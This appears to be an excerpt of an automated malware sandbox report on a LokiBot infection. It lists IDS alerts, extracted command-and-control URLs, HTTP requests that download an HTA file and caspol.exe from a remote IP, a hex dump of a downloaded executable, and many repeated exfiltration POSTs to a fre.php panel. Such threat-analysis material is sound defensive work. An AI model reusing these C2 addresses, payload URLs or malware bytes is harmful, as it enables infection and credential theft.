                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49219 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49210
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49269
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49219 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49241 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49241 -> 94.156.177.41:80
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: 94.156.177.41/maxzi/five/fre.php
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03540499 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_03540499
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Nov 2024 10:08:09 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Wed, 20 Nov 2024 01:27:09 GMTETag: "92a00-6274e0c657f44"Accept-Ranges: bytesContent-Length: 600576Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed 3a 3d 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 09 00 00 20 00 00 00 00 00 00 e6 26 09 00 00 20 00 00 00 40 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 26 09 00 4f 00 00 00 00 40 09 00 7c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ec 06 09 00 00 20 00 00 00 08 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 7c 1d 00 00 00 40 09 00 00 1e 00 00 00 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 09 00 00 02 00 00 00 28 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 26 09 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 36 00 00 0c 28 00 00 03 00 00 00 16 00 00 06 b4 5e 00 00 e0 c7 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c2 02 28 14 00 00 0a 02 03 7d 01 00 00 04 02 7b 01 00 00 04 72 01 00 00 70 20 d1 01 00 00 17 6f 35 00 00 06 02 7b 01 00 00 04 6f 37 00 00 06 26 2a 00 00 00 1b 30 03 00 1f 00 00 00 01 00 00 11 02 7b 01 00 00 04 03 04 6f 39 00 00 06 02 03 7d 02 00 00 04 17 0a de 05 26 16 0a de 00 06 2a 00 01 10 00 00 00 00 00 00 18 18 00 05 0a 00 00 02 1b 30 03 00 74 00 00 00 02 00 00 11 05 6f 15 00 00 0a 02 7b 01 00 00 04 02 7b 02 00 00 04 72 1f 00 00 70 28 16 00 00 0a 6f 3a 00 00 06 03 0a 16 0b 2b 25 06 07 9a 0c 02 7b 01 00 00 04 08 6f 17 00 00 0a 6f 3b 00 00 06 05 08 6f 18 00 00 0a de 03 26 de 00 07 17 58 0b 07 06 8e 69 32 d5 02 7b 01 00 00 04 04 6f 3c 00 00 06 17 0d de 10 26 02 7b 01 00 00 04 6f 3d 00 00 06 16 0d de 00 09 2a 01 1c 00 00 00 00 2b 00 1a 45 00 03 0a 00 00 02 00 00 06 00 5c 62 00 10 0a 00 00 02 32 02 7b 01 00 00 04 6f 41 00 00 06 2a 6e 02 28 19 00 00 0a 02 03 7d 03 00 00 04 02
                Source: Joe Sandbox ViewIP Address: 94.156.177.41 94.156.177.41
                Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
                Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
                Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49163 -> 66.63.187.231:80
                Source: global trafficHTTP traffic detected: GET /xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.231Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /33/caspol.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.231Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
